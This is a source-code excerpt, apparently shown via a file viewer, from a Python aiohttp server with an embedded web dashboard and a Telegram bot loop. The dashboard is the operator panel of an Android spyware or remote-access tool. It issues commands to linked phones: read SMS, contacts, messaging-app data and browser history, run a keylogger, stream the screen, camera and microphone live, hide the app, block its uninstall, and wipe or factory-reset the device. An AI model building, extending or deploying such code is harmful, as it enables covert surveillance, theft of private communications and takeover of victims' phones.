   100в†’   100в†’  3099в†’${cmds.length?cmds.map(c=>`<div class="cmd-item"><div class="cmd-header"><span>${c.command}</span><span class="badge badge-${c.status==='completed'?'green':c.status==='pending'?'yellow':'blue'}">${c.status}</span></div><div style="color:var(--text2);font-size:12px">${c.created_at} | ID: ${c.id}</div></div>`).join(''):'<div class="empty">No commands</div>'}
   101в†’   101в†’  3100в†’<button class="btn btn-danger btn-sm" onclick="unlinkDevice('${d.id}')" style="margin-top:16px">рџ—‘пёЏ Unlink Device</button>`;
   102в†’   102в†’  3101в†’detail.scrollIntoView({behavior:'smooth'});
   103в†’   103в†’  3102в†’}catch(e){}
   104в†’   104в†’  3103в†’}
   105в†’   105в†’  3104в†’
   106в†’   106в†’  3105в†’async function unlinkDevice(id){
   107в†’   107в†’  3106в†’if(!confirm('Unlink this device?'))return;
   108в†’   108в†’  3107в†’const r=await api('web/unlink/'+id,{method:'DELETE'});
   109в†’   109в†’  3108в†’if(r.ok){notify('Device unlinked');loadAll();}
   110в†’   110в†’  3109в†’else notify('Failed','var(--accent)');
   111в†’   111в†’  3110в†’}
   112в†’   112в†’  3111в†’
   113в†’   113в†’  3112в†’async function generateLink(){
   114в†’   114в†’  3113в†’const r=await api('web/link_code');
   115в†’   115в†’  3114в†’if(r.ok){
   116в†’   116в†’  3115в†’const box=document.getElementById('linkCodeBox');
   117в†’   117в†’  3116в†’document.getElementById('linkCodeText').textContent=r.code;
   118в†’   118в†’  3117в†’box.style.display='block';
   119в†’   119в†’  3118в†’notify('Link code generated!');
   120в†’   120в†’  3119в†’}
   121в†’   121в†’  3120в†’}
   122в†’   122в†’  3121в†’
   123в†’   123в†’  3122в†’const CMD_CATEGORIES={
   124в†’   124в†’  3123в†’data:{label:'рџ“Љ Data',cmds:['sms','calls','contacts','location','notifications','apps','info','battery','gallery','clipboard','all_data','wifi_info','bluetooth_devices','network_info','sim_info','storage_info','installed_apps','running_apps','calendar','browser_history']},
   125в†’   125в†’  3124в†’social:{label:'рџЊђ Social',cmds:['whatsapp','telegram_app','instagram','messenger','snapchat','tiktok','twitter','viber','signal','facebook','whatsapp_status','whatsapp_stories','telegram_channels','instagram_stories','youtube']},
   126в†’   126в†’  3125в†’control:{label:'рџЋ® Control',cmds:['ping','vibrate','ring','screenshot','front_camera','back_camera','record_audio','record_video','lock_phone','unlock_phone','reboot','shutdown','set_volume','set_brightness','enable_wifi','disable_wifi','enable_bluetooth','disable_bluetooth','enable_mobile_data','disable_mobile_data','enable_hotspot','disable_hotspot','airplane_on','airplane_off','torch_on','torch_off','play_sound','speak_text','open_url','send_sms','make_call','block_number','unblock_number']},
   127в†’   127в†’  3126в†’apps:{label:'рџ“¦ Apps',cmds:['open_app','close_app','install_app','uninstall_app','block_app','unblock_app','clear_app_data','force_stop_app','app_info','app_usage','screen_time','app_permissions','enable_app','disable_app','list_blocked','clear_cache','update_app','launch_app','kill_app','app_cache']},
   128в†’   128в†’  3127в†’files:{label:'рџ“‚ Files',cmds:['list_files','get_file','download_file','list_downloads','list_dcim','list_music','list_videos','list_documents','list_whatsapp','list_telegram_files','send_contacts_backup','send_sms_backup','send_calls_backup','send_full_backup','delete_file','rename_file','copy_file','move_file','create_folder','search_files','recent_files','file_info','zip_files']},
   129в†’   129в†’  3128в†’security:{label:'рџ”’ Security',cmds:['wipe_data','factory_reset','show_app','hide_app','change_passcode','set_pin','remove_pin','enable_biometric','disable_biometric','anti_uninstall_on','anti_uninstall_off','device_admin_status','check_root','set_screen_lock','remove_screen_lock']},
   130в†’   130в†’  3129в†’monitor:{label:'рџ”Ќ Monitor',cmds:['keylogger_start','keylogger_stop','get_keylogger','screen_record_start','screen_record_stop','clipboard_monitor_start','clipboard_monitor_stop','get_clipboard_log','wifi_monitor_start','wifi_monitor_stop','app_monitor_start','app_monitor_stop','get_app_log','location_live','location_stop','location_history','geo_add','geo_remove','geo_list','sms_monitor','call_monitor']},
   131в†’   131в†’  3130в†’syssettings:{label:'вљ™пёЏ System',cmds:['set_language','set_timezone','set_alarm','set_timer','set_reminder','enable_dev_mode','disable_dev_mode','enable_usb_debug','disable_usb_debug','dns_change','proxy_set','apn_settings','nfc_on','nfc_off','auto_update_on','auto_update_off']}
   132в†’   132в†’  3131в†’};
   133в†’   133в†’  3132в†’
   134в†’   134в†’  3133в†’function initCmdTabs(){
   135в†’   135в†’  3134в†’const tabs=document.getElementById('cmdTabs');
   136в†’   136в†’  3135в†’tabs.innerHTML=Object.keys(CMD_CATEGORIES).map(k=>`<button class="tab${k==='data'?' active':''}" onclick="showCmdCat('${k}',this)">${CMD_CATEGORIES[k].label}</button>`).join('');
   137в†’   137в†’  3136в†’showCmdCat('data');
   138в†’   138в†’  3137в†’}
   139в†’   139в†’  3138в†’
   140в†’   140в†’  3139в†’function showCmdCat(cat,btn){
   141в†’   141в†’  3140в†’if(btn){document.querySelectorAll('#cmdTabs .tab').forEach(t=>t.classList.remove('active'));btn.classList.add('active');}
   142в†’   142в†’  3141в†’const grid=document.getElementById('cmdGrid');
   143в†’   143в†’  3142в†’grid.innerHTML=CMD_CATEGORIES[cat].cmds.map(c=>`<button class="cmd-btn" onclick="sendDeviceCmd('${c}')">${c.replace(/_/g,' ')}</button>`).join('');
   144в†’   144в†’  3143в†’}
   145в†’   145в†’  3144в†’
   146в†’   146в†’  3145в†’async function sendDeviceCmd(cmd){
   147в†’   147в†’  3146в†’const devId=document.getElementById('cmdDevice').value;
   148в†’   148в†’  3147в†’if(!devId){notify('Select a device','var(--accent)');return;}
   149в†’   149в†’  3148в†’const r=await api('web/send_command',{method:'POST',body:JSON.stringify({device_id:devId,command:cmd})});
   150в†’   150в†’  3149в†’if(r.ok)notify('Command sent!');else notify('Failed','var(--accent)');
   151в†’   151в†’  3150в†’loadAll();
   152в†’   152в†’  3151в†’}
   153в†’   153в†’  3152в†’
   154в†’   154в†’  3153в†’function sendCmd(cmd){
   155в†’   155в†’  3154в†’const devId=document.getElementById('fileDevice').value;
   156в†’   156в†’  3155в†’if(!devId){notify('Select a device','var(--accent)');return;}
   157в†’   157в†’  3156в†’api('web/send_command',{method:'POST',body:JSON.stringify({device_id:devId,command:cmd})}).then(r=>{
   158в†’   158в†’  3157в†’if(r.ok)notify('Command sent!');else notify('Failed','var(--accent)');
   159в†’   159в†’  3158в†’});
   160в†’   160в†’  3159в†’}
   161в†’   161в†’  3160в†’function sendDataCmd(cmd){
   162в†’   162в†’  3161в†’const devId=document.getElementById('dataDevice').value;
   163в†’   163в†’  3162в†’if(!devId){notify('Select a device','var(--accent)');return;}
   164в†’   164в†’  3163в†’api('web/send_command',{method:'POST',body:JSON.stringify({device_id:devId,command:'get_'+cmd})}).then(r=>{
   165в†’   165в†’  3164в†’if(r.ok)notify('Command sent!');else notify('Failed','var(--accent)');
   166в†’   166в†’  3165в†’});
   167в†’   167в†’  3166в†’}
   168в†’   168в†’  3167в†’function sendMonCmd(cmd){
   169в†’   169в†’  3168в†’const devId=document.getElementById('monDevice').value;
   170в†’   170в†’  3169в†’if(!devId){notify('Select a device','var(--accent)');return;}
   171в†’   171в†’  3170в†’api('web/send_command',{method:'POST',body:JSON.stringify({device_id:devId,command:cmd})}).then(r=>{
   172в†’   172в†’  3171в†’if(r.ok)notify('Command sent!');else notify('Failed','var(--accent)');
   173в†’   173в†’  3172в†’});
   174в†’   174в†’  3173в†’}
   175в†’   175в†’  3174в†’
   176в†’   176в†’  3175в†’function renderCommandLog(cmds){
   177в†’   177в†’  3176в†’const el=document.getElementById('cmdLog');
   178в†’   178в†’  3177в†’const dash=document.getElementById('dashCommands');
   179в†’   179в†’  3178в†’const items=(cmds||[]).slice(-20).reverse();
   180в†’   180в†’  3179в†’if(!items.length){el.innerHTML='<div class="empty">No commands</div>';dash.innerHTML='';return;}
   181в†’   181в†’  3180в†’const html=items.map(c=>`<div class="cmd-item"><div class="cmd-header"><span>${c.command}</span><span class="badge badge-${c.status==='completed'?'green':c.status==='pending'?'yellow':'blue'}">${c.status}</span></div><div style="color:var(--text2);font-size:12px">Device: ${c.device_id} | ${c.created_at}</div></div>`).join('');
   182в†’   182в†’  3181в†’el.innerHTML=html;
   183в†’   183в†’  3182в†’dash.innerHTML=html;
   184в†’   184в†’  3183в†’}
   185в†’   185в†’  3184в†’
   186в†’   186в†’  3185в†’async function loadEvents(){
   187в†’   187в†’  3186в†’const r=await api('web/events');
   188в†’   188в†’  3187в†’if(r.ok){
   189в†’   189в†’  3188в†’const el=document.getElementById('eventLog');
   190в†’   190в†’  3189в†’el.innerHTML=(r.events||[]).slice(-50).reverse().map(e=>`<div class="log-item"><span class="time">${(e.time||'').slice(0,19)}</span><span class="event">${e.event} ${e.details?JSON.stringify(e.details).slice(0,60):''}</span></div>`).join('')||'<div class="empty">No events</div>';
   191в†’   191в†’  3190в†’}
   192в†’   192в†’  3191в†’}
   193в†’   193в†’  3192в†’
   194в†’   194в†’  3193в†’async function loadSettings(){
   195в†’   195в†’  3194в†’const r=await api('web/settings');
   196в†’   196в†’  3195в†’if(r.ok){
   197в†’   197в†’  3196в†’const s=r.settings;
   198в†’   198в†’  3197в†’document.getElementById('settingsForm').innerHTML=`
   199в†’   199в†’  3198в†’<label style="display:block;margin-bottom:12px">рџ”‘ Admin Password<input id="setPass" value="${s.admin_password||'admin'}" style="display:block;width:100%;padding:8px;border-radius:6px;border:1px solid var(--border);background:var(--bg);color:var(--text);margin-top:4px"></label>
   200в†’   200в†’  3199в†’<label style="display:block;margin-bottom:12px">вЏ±пёЏ Sync Interval (sec)<input id="setSync" type="number" value="${s.sync_interval||300}" style="display:block;width:100%;padding:8px;border-radius:6px;border:1px solid var(--border);background:var(--bg);color:var(--text);margin-top:4px"></label>
   201в†’   201в†’  3200в†’<label style="display:block;margin-bottom:12px">рџ“Ќ Location Interval (sec)<input id="setLoc" type="number" value="${s.location_interval||60}" style="display:block;width:100%;padding:8px;border-radius:6px;border:1px solid var(--border);background:var(--bg);color:var(--text);margin-top:4px"></label>
   202в†’   202в†’  3201в†’<label style="display:block;margin-bottom:12px">рџЊђ Language<select id="setLang" style="display:block;width:100%;padding:8px;border-radius:6px;border:1px solid var(--border);background:var(--bg);color:var(--text);margin-top:4px"><option value="ar" ${s.language==='ar'?'selected':''}>Arabic</option><option value="en" ${s.language==='en'?'selected':''}>English</option></select></label>
   203в†’   203в†’  3202в†’<label style="display:flex;align-items:center;gap:8px;margin-bottom:12px"><input type="checkbox" id="setNotif" ${s.notifications?'checked':''}> рџ”” Notifications</label>
   204в†’   204в†’  3203в†’<label style="display:flex;align-items:center;gap:8px;margin-bottom:12px"><input type="checkbox" id="setAutoLoc" ${s.auto_location?'checked':''}> рџ—єпёЏ Auto Location</label>
   205в†’   205в†’  3204в†’<label style="display:flex;align-items:center;gap:8px;margin-bottom:12px"><input type="checkbox" id="setAutoSync" ${s.auto_sync?'checked':''}> рџ”„ Auto Sync</label>`;
   206в†’   206в†’  3205в†’}
   207в†’   207в†’  3206в†’}
   208в†’   208в†’  3207в†’
   209в†’   209в†’  3208в†’async function saveSettings(){
   210в†’   210в†’  3209в†’const data={
   211в†’   211в†’  3210в†’admin_password:document.getElementById('setPass').value,
   212в†’   212в†’  3211в†’sync_interval:parseInt(document.getElementById('setSync').value),
   213в†’   213в†’  3212в†’location_interval:parseInt(document.getElementById('setLoc').value),
   214в†’   214в†’  3213в†’language:document.getElementById('setLang').value,
   215в†’   215в†’  3214в†’notifications:document.getElementById('setNotif').checked,
   216в†’   216в†’  3215в†’auto_location:document.getElementById('setAutoLoc').checked,
   217в†’   217в†’  3216в†’auto_sync:document.getElementById('setAutoSync').checked,
   218в†’   218в†’  3217в†’};
   219в†’   219в†’  3218в†’const r=await api('web/settings',{method:'PUT',body:JSON.stringify(data)});
   220в†’   220в†’  3219в†’if(r.ok)notify('Settings saved!');else notify('Failed','var(--accent)');
   221в†’   221в†’  3220в†’}
   222в†’   222в†’  3221в†’
   223в†’   223в†’  3222в†’if(TOKEN){showApp();}
   224в†’   224в†’  3223в†’initCmdTabs();
   225в†’   225в†’  3224в†’setTimeout(loadSettings,500);
   226в†’   226в†’  3225в†’
   227в†’   227в†’  3226в†’// ========== LIVE STREAMING (JPEG Screenshot-based) ==========
   228в†’   228в†’  3227в†’let _streamType='screen';
   229в†’   229в†’  3228в†’let _streamActive=false;
   230в†’   230в†’  3229в†’let _streamPollTimer=null;
   231в†’   231в†’  3230в†’let _frameCount=0;
   232в†’   232в†’  3231в†’let _audioAnimFrame=null;
   233в†’   233в†’  3232в†’let _streamWaitingTimer=null;
   234в†’   234в†’  3233в†’let _firstFrameReceived=false;
   235в†’   235в†’  3234в†’let _lastFrameData='';
   236в†’   236в†’  3235в†’
   237в†’   237в†’  3236в†’function populateStreamDeviceSelect(){
   238в†’   238в†’  3237в†’const html=DEVICES.map(d=>'<option value="'+d.id+'">'+(d.name||d.id)+' ('+(d.active?'&#x1F7E2;':'&#x1F534;')+')</option>').join('');
   239в†’   239в†’  3238в†’const el=document.getElementById('streamDevice');if(el)el.innerHTML=html;
   240в†’   240в†’  3239в†’}
   241в†’   241в†’  3240в†’const _origPopulate=populateDeviceSelects;
   242в†’   242в†’  3241в†’populateDeviceSelects=function(){
   243в†’   243в†’  3242в†’_origPopulate();populateStreamDeviceSelect();
   244в†’   244в†’  3243в†’};
   245в†’   245в†’  3244в†’
   246в†’   246в†’  3245в†’function onStreamDeviceChange(){
   247в†’   247в†’  3246в†’const devId=document.getElementById('streamDevice').value;
   248в†’   248в†’  3247в†’document.getElementById('stDevice').textContent=devId?((DEVICES.find(function(d){return d.id===devId;})||{}).name||devId):'-';
   249в†’   249в†’  3248в†’if(_streamActive)stopStream();
   250в†’   250в†’  3249в†’}
   251в†’   251в†’  3250в†’
   252в†’   252в†’  3251в†’function selectStreamType(type){
   253в†’   253в†’  3252в†’_streamType=type;
   254в†’   254в†’  3253в†’document.querySelectorAll('.stream-type-btn').forEach(function(b){b.classList.remove('active');});
   255в†’   255в†’  3254в†’var btnId=type==='screen'?'stScreen':type==='camera'?'stCamera':'stAudio';
   256в†’   256в†’  3255в†’document.getElementById(btnId).classList.add('active');
   257в†’   257в†’  3256в†’document.getElementById('qualityCard').style.display=type==='audio'?'none':'block';
   258в†’   258в†’  3257в†’}
   259в†’   259в†’  3258в†’
   260в†’   260в†’  3259в†’function setQuality(q,btn){
   261в†’   261в†’  3260в†’document.querySelectorAll('.stream-quality button').forEach(function(b){b.classList.remove('active');});
   262в†’   262в†’  3261в†’btn.classList.add('active');
   263в†’   263в†’  3262в†’notify('ШЄЩ… ШЄШєЩЉЩЉШ± Ш§Щ„Ш¬Щ€ШЇШ©');
   264в†’   264в†’  3263в†’}
   265в†’   265в†’  3264в†’
   266в†’   266в†’  3265в†’function _setViewerState(state){
   267в†’   267в†’  3266в†’var viewer=document.getElementById('streamViewer');
   268в†’   268в†’  3267в†’var noMsg=document.getElementById('noStreamMsg');
   269в†’   269в†’  3268в†’var img=document.getElementById('streamImg');
   270в†’   270в†’  3269в†’var badge=document.getElementById('streamBadge');
   271в†’   271в†’  3270в†’var audioC=document.getElementById('audioPlayerContainer');
   272в†’   272в†’  3271в†’noMsg.style.display='none';img.style.display='none';badge.style.display='none';audioC.style.display='none';viewer.style.background='#000';
   273в†’   273в†’  3272в†’if(state==='idle'){noMsg.style.display='';noMsg.innerHTML='<div style="font-size:48px;margin-bottom:12px">&#x1F4E1;</div>Ш§Ш®ШЄШ± Ш¬Щ‡Ш§ШІШ§Щ‹ Щ€Ш§ШЁШЇШЈ Ш§Щ„ШЁШ« Ш§Щ„Щ…ШЁШ§ШґШ±';viewer.style.background='var(--surface)';}
   274в†’   274в†’  3273в†’else if(state==='waiting'){noMsg.style.display='';noMsg.innerHTML='<div style="text-align:center"><div class="pulse" style="font-size:48px;margin-bottom:16px">&#x231B;</div><div style="font-size:16px;font-weight:600;margin-bottom:8px">Ш¬Ш§Ш±ЩЉ Ш§Щ†ШЄШёШ§Ш± Ш§Щ„ШµЩ€Ш±Ш© Щ…Щ† Ш§Щ„Ш¬Щ‡Ш§ШІ...</div><div style="color:var(--text2);font-size:13px">ЩЉШЄЩ… ШҐШ±ШіШ§Щ„ ШЈЩ…Ш± Щ„Щ‚Ш·Ш© Ш§Щ„ШґШ§ШґШ© Щ„Щ„Ш¬Щ‡Ш§ШІ.<br>Щ‚ШЇ ЩЉШіШЄШєШ±Щ‚ Ш§Щ„ШЈЩ…Ш± ШЁШ¶Ш№ Ш«Щ€Ш§Щ†ЩЌ Щ„Щ„ШҐШ·Ш§Ш± Ш§Щ„ШЈЩ€Щ„.<br>ШЄШЈЩѓШЇ ШЈЩ† Ш§Щ„Ш¬Щ‡Ш§ШІ Щ…ШЄШµЩ„ ШЁШ§Щ„ШҐЩ†ШЄШ±Щ†ШЄ Щ€ШЈЩ† ШҐШ°Щ† Ш§Щ„ШЄЩ‚Ш§Ш· Ш§Щ„ШґШ§ШґШ© Щ…Щ…Щ†Щ€Ш­Ш©.</div></div>';document.getElementById('stStatus').innerHTML='<span style="color:var(--yellow)">в—Џ Ш§Щ†ШЄШёШ§Ш±...</span>';}
   275в†’   275в†’  3274в†’else if(state==='connected'){document.getElementById('stStatus').innerHTML='<span style="color:var(--blue)">в—Џ Щ…ШЄШµЩ„ - ЩЉЩ†ШЄШёШ± ШҐШ·Ш§Ш±...</span>';}
   276в†’   276в†’  3275в†’else if(state==='receiving_video'){img.style.display='';badge.style.display='';badge.className='stream-badge live';noMsg.style.display='none';document.getElementById('stStatus').innerHTML='<span style="color:var(--green)">в—Џ Щ…ШЁШ§ШґШ±</span>';}
   277в†’   277в†’  3276в†’else if(state==='receiving_audio'){audioC.style.display='block';badge.style.display='';badge.className='stream-badge live';noMsg.style.display='none';document.getElementById('stStatus').innerHTML='<span style="color:var(--green)">в—Џ Щ…ШЁШ§ШґШ±</span>';}
   278в†’   278в†’  3277в†’else if(state==='error'){noMsg.style.display='';noMsg.innerHTML='<div style="text-align:center"><div style="font-size:48px;margin-bottom:16px">&#x26A0;&#xFE0F;</div><div style="font-size:16px;font-weight:600;margin-bottom:8px;color:var(--accent)">Щ„Щ… ЩЉШЄЩ… Ш§ШіШЄЩ„Ш§Щ… Ш§Щ„ШЁШ«</div><div style="color:var(--text2);font-size:13px">ШЄШЈЩѓШЇ ШЈЩ† Ш§Щ„Ш¬Щ‡Ш§ШІ Щ…ШЄШµЩ„ Щ€ЩЉЩ…ЩѓЩ†Щ‡ ШЄЩ†ЩЃЩЉШ° ШЈЩ…Ш± Щ„Щ‚Ш·Ш© Ш§Щ„ШґШ§ШґШ©.<br>ШЄШЈЩѓШЇ Щ…Щ† Щ…Щ†Ш­ ШҐШ°Щ† Ш§Щ„ШЄЩ‚Ш§Ш· Ш§Щ„ШґШ§ШґШ© ЩЃЩЉ ШЄШ·ШЁЩЉЩ‚ Ш§Щ„Ш¬Щ‡Ш§ШІ.<br>Ш­Ш§Щ€Щ„ Щ…Ш±Ш© ШЈШ®Ш±Щ‰.</div></div>';document.getElementById('stStatus').innerHTML='<span style="color:var(--accent)">в—Џ ЩЃШґЩ„</span>';}
   279в†’   279в†’  3278в†’}
   280в†’   280в†’  3279в†’
   281в†’   281в†’  3280в†’async function startStream(){
   282в†’   282в†’  3281в†’var devId=document.getElementById('streamDevice').value;
   283в†’   283в†’  3282в†’if(!devId){notify('Ш§Ш®ШЄШ± Ш¬Щ‡Ш§ШІШ§Щ‹ ШЈЩ€Щ„Ш§Щ‹','var(--accent)');return;}
   284в†’   284в†’  3283в†’_streamActive=true;_frameCount=0;_firstFrameReceived=false;_lastFrameData='';
   285в†’   285в†’  3284в†’document.getElementById('btnStartStream').style.display='none';
   286в†’   286в†’  3285в†’document.getElementById('btnStopStream').style.display='';
   287в†’   287в†’  3286в†’document.getElementById('btnSwitchCam').style.display=_streamType==='camera'?'':'none';
   288в†’   288в†’  3287в†’document.getElementById('stFrames').textContent='0';
   289в†’   289в†’  3288в†’document.getElementById('stLastAct').textContent='-';
   290в†’   290в†’  3289в†’var typeLabel=_streamType==='screen'?'Ш§Щ„ШґШ§ШґШ©':_streamType==='camera'?'Ш§Щ„ЩѓШ§Щ…ЩЉШ±Ш§':'Ш§Щ„ШµЩ€ШЄ';
   291в†’   291в†’  3290в†’document.getElementById('stType').textContent=typeLabel;
   292в†’   292в†’  3291в†’var dev=DEVICES.find(function(d){return d.id===devId;});
   293в†’   293в†’  3292в†’document.getElementById('stDevice').textContent=(dev&&dev.name)||devId;
   294в†’   294в†’  3293в†’_setViewerState('waiting');
   295в†’   295в†’  3294в†’notify('Ш¬Ш§Ш±ЩЉ ШЁШЇШЎ Ш§Щ„ШЁШ«: '+typeLabel);
   296в†’   296в†’  3295в†’var interval=_streamType==='audio'?5:3;
   297в†’   297в†’  3296в†’var r=await api('stream/jpeg_start',{method:'POST',body:JSON.stringify({device_id:devId,type:_streamType,interval:interval})});
   298в†’   298в†’  3297в†’if(!r.ok){notify('ЩЃШґЩ„ ШЁШЇШЎ Ш§Щ„ШЁШ«: '+(r.error||''),'var(--accent)');_setViewerState('error');_streamActive=false;document.getElementById('btnStartStream').style.display='';document.getElementById('btnStopStream').style.display='none';return;}
   299в†’   299в†’  3298в†’notify('ШЄЩ… ШЁШЇШЎ Ш§Щ„ШЁШ« - ШЁШ§Щ†ШЄШёШ§Ш± Ш§Щ„ШҐШ·Ш§Ш± Ш§Щ„ШЈЩ€Щ„...');
   300в†’   300в†’  3299в†’startStreamPolling(devId);
   301в†’   301в†’  3300в†’if(_streamWaitingTimer)clearTimeout(_streamWaitingTimer);
   302в†’   302в†’  3301в†’_streamWaitingTimer=setTimeout(function(){if(_streamActive&&!_firstFrameReceived){_setViewerState('error');}},60000);
   303в†’   303в†’  3302в†’}
   304в†’   304в†’  3303в†’
   305в†’   305в†’  3304в†’async function stopStream(){
   306в†’   306в†’  3305в†’var devId=document.getElementById('streamDevice').value;
   307в†’   307в†’  3306в†’if(!devId)return;
   308в†’   308в†’  3307в†’api('stream/jpeg_stop',{method:'POST',body:JSON.stringify({device_id:devId})});
   309в†’   309в†’  3308в†’_cleanupStream();
   310в†’   310в†’  3309в†’notify('ШЄЩ… ШҐЩЉЩ‚Ш§ЩЃ Ш§Щ„ШЁШ«');
   311в†’   311в†’  3310в†’}
   312в†’   312в†’  3311в†’
   313в†’   313в†’  3312в†’function _cleanupStream(){
   314в†’   314в†’  3313в†’_streamActive=false;_firstFrameReceived=false;_lastFrameData='';
   315в†’   315в†’  3314в†’if(_streamPollTimer){clearInterval(_streamPollTimer);_streamPollTimer=null;}
   316в†’   316в†’  3315в†’if(_streamWaitingTimer){clearTimeout(_streamWaitingTimer);_streamWaitingTimer=null;}
   317в†’   317в†’  3316в†’if(_audioAnimFrame){cancelAnimationFrame(_audioAnimFrame);_audioAnimFrame=null;}
   318в†’   318в†’  3317в†’document.getElementById('btnStartStream').style.display='';
   319в†’   319в†’  3318в†’document.getElementById('btnStopStream').style.display='none';
   320в†’   320в†’  3319в†’document.getElementById('btnSwitchCam').style.display='none';
   321в†’   321в†’  3320в†’_setViewerState('idle');
   322в†’   322в†’  3321в†’document.getElementById('stStatus').textContent='Щ…ШЄЩ€Щ‚ЩЃ';
   323в†’   323в†’  3322в†’}
   324в†’   324в†’  3323в†’
   325в†’   325в†’  3324в†’async function switchCamera(){
   326в†’   326в†’  3325в†’var devId=document.getElementById('streamDevice').value;
   327в†’   327в†’  3326в†’if(!devId)return;
   328в†’   328в†’  3327в†’await api('stream/jpeg_stop',{method:'POST',body:JSON.stringify({device_id:devId})});
   329в†’   329в†’  3328в†’_streamType='camera';
   330в†’   330в†’  3329в†’var r=await api('stream/jpeg_start',{method:'POST',body:JSON.stringify({device_id:devId,type:'camera',interval:3})});
   331в†’   331в†’  3330в†’if(r.ok){_streamActive=true;_firstFrameReceived=false;_setViewerState('waiting');startStreamPolling(devId);}
   332в†’   332в†’  3331в†’notify('ШЄЩ… ШЄШЁШЇЩЉЩ„ Ш§Щ„ЩѓШ§Щ…ЩЉШ±Ш§');
   333в†’   333в†’  3332в†’}
   334в†’   334в†’  3333в†’
   335в†’   335в†’  3334в†’function _onFrameReceived(base64Data,isAudio){
   336в†’   336в†’  3335в†’if(base64Data===_lastFrameData)return;
   337в†’   337в†’  3336в†’_lastFrameData=base64Data;
   338в†’   338в†’  3337в†’if(!_firstFrameReceived){_firstFrameReceived=true;if(_streamWaitingTimer){clearTimeout(_streamWaitingTimer);_streamWaitingTimer=null;}}
   339в†’   339в†’  3338в†’_frameCount++;
   340в†’   340в†’  3339в†’document.getElementById('stFrames').textContent=_frameCount;
   341в†’   341в†’  3340в†’document.getElementById('stLastAct').textContent=new Date().toLocaleTimeString();
   342в†’   342в†’  3341в†’if(isAudio){_setViewerState('receiving_audio');}
   343в†’   343в†’  3342в†’else{_setViewerState('receiving_video');document.getElementById('streamImg').src='data:image/jpeg;base64,'+base64Data;}
   344в†’   344в†’  3343в†’}
   345в†’   345в†’  3344в†’
   346в†’   346в†’  3345в†’function startStreamPolling(devId){
   347в†’   347в†’  3346в†’if(_streamPollTimer)clearInterval(_streamPollTimer);
   348в†’   348в†’  3347в†’_streamPollTimer=setInterval(async function(){
   349в†’   349в†’  3348в†’if(!_streamActive)return;
   350в†’   350в†’  3349в†’try{
   351в†’   351в†’  3350в†’var typeParam=_streamType==='audio'?'audio':'video';
   352в†’   352в†’  3351в†’var resp=await fetch('/api/stream/frame/'+devId+'?type='+typeParam);
   353в†’   353в†’  3352в†’var r=await resp.json();
   354в†’   354в†’  3353в†’if(r.ok&&r.data&&r.data.length>50){_onFrameReceived(r.data,false);}
   355в†’   355в†’  3354в†’else if(r.ok&&_firstFrameReceived){}
   356в†’   356в†’  3355в†’else if(!_firstFrameReceived){
   357в†’   357в†’  3356в†’try{var sr=await fetch('/api/stream/status');var status=await sr.json();if(status.ok&&status.active_streams&&status.active_streams[devId]){if(!_firstFrameReceived)_setViewerState('connected');}else if(!_firstFrameReceived&&_streamActive){_setViewerState('waiting');}}catch(e){}
   358в†’   358в†’  3357в†’}
   359в†’   359в†’  3358в†’}catch(e){}
   360в†’   360в†’  3359в†’},2000);
   361в†’   361в†’  3360в†’}
   362в†’   362в†’  3361в†’
   363в†’   363в†’  3362в†’// Add streaming category to commands
   364в†’   364в†’  3363в†’if(typeof CMD_CATEGORIES!=='undefined'){
   365в†’   365в†’  3364в†’CMD_CATEGORIES.streaming={label:'рџ“Ў Streaming',cmds:['start_screen_stream','stop_screen_stream','start_camera_stream','stop_camera_stream','switch_camera','start_audio_stream','stop_audio_stream','get_stream_status','set_stream_quality','enable_torch','pause_stream','resume_stream','stop_all_streams','get_stream_capabilities']};
   366в†’   366в†’  3365в†’if(document.getElementById('cmdTabs')){
   367в†’   367в†’  3366в†’var tabs=document.getElementById('cmdTabs');
   368в†’   368в†’  3367в†’if(tabs.innerHTML.indexOf('Streaming')===-1){
   369в†’   369в†’  3368в†’tabs.innerHTML+='<button class="tab" onclick="showCmdCat(\'streaming\',this)">рџ“Ў Streaming</button>';
   370в†’   370в†’  3369в†’}
   371в†’   371в†’  3370в†’}
   372в†’   372в†’  3371в†’}
   373в†’   373в†’  3372в†’</script>
   374в†’   374в†’  3373в†’</body>
   375в†’   375в†’  3374в†’</html>"""
   376в†’   376в†’  3375в†’
   377в†’   377в†’  3376в†’# ============================================================================
   378в†’   378в†’  3377в†’# WEB DASHBOARD ROUTE
   379в†’   379в†’  3378в†’# ============================================================================
   380в†’   380в†’  3379в†’
   381в†’   381в†’  3380в†’async def serve_dashboard(request):
   382в†’   382в†’  3381в†’    return web.Response(text=DASHBOARD_HTML, content_type="text/html", charset="utf-8")
   383в†’   383в†’  3382в†’
   384в†’   384в†’  3383в†’# ============================================================================
   385в†’   385в†’  3384в†’# GETUPDATES POLLING
   386в†’   386в†’  3385в†’# ============================================================================
   387в†’   387в†’  3386в†’
   388в†’   388в†’  3387в†’async def tg_poll_loop():
   389в†’   389в†’  3388в†’    global tg_offset, polling_active, _processed_update_ids, _processed_message_keys
   390в†’   390в†’  3389в†’    polling_active = True
   391в†’   391в†’  3390в†’    
   392в†’   392в†’  3391в†’    # === ШЄЩ†ШёЩЉЩЃ Ш§Щ„Ш§ШЄШµШ§Щ„Ш§ШЄ Ш§Щ„Щ‚ШЇЩЉЩ…Ш© Ш№Щ†ШЇ ШЁШЇШЎ Ш§Щ„ШЄШґШєЩЉЩ„ ===
   393в†’   393в†’  3392в†’    log.info("Cleaning old connections (deleteWebhook)...")
   394в†’   394в†’  3393в†’    try:
   395в†’   395в†’  3394в†’        session = get_tg_session()
   396в†’   396в†’  3395в†’        # Ш­Ш°ЩЃ webhook Щ€ШЄШ¬Ш§Щ‡Щ„ Ш§Щ„ШЄШ­ШЇЩЉШ«Ш§ШЄ Ш§Щ„Щ…Ш№Щ„Щ‚Ш©
   397в†’   397в†’  3396в†’        async with session.post(f"https://api.telegram.org/bot{BOT_TOKEN}/deleteWebhook?drop_pending_updates=true") as resp:
   398в†’   398в†’  3397в†’            r = await resp.json()
   399в†’   399в†’  3398в†’            log.info("deleteWebhook: %s", r.get("description", r.get("ok")))
   400в†’   400в†’  3399в†’        await asyncio.sleep(1)
   401в†’   401в†’  3400в†’        # Ш§Щ„ШЄШ­Щ‚Щ‚ Щ…Щ† Ш§Щ„ШЁЩ€ШЄ
   402в†’   402в†’  3401в†’        async with session.post(f"https://api.telegram.org/bot{BOT_TOKEN}/getMe") as resp:
   403в†’   403в†’  3402в†’            me = await resp.json()
   404в†’   404в†’  3403в†’            if me.get("ok"):
   405в†’   405в†’  3404в†’                log.info("Bot connected: @%s (%s)", me["result"].get("username", "?"), me["result"].get("first_name", "?"))
   406в†’   406в†’  3405в†’            else:
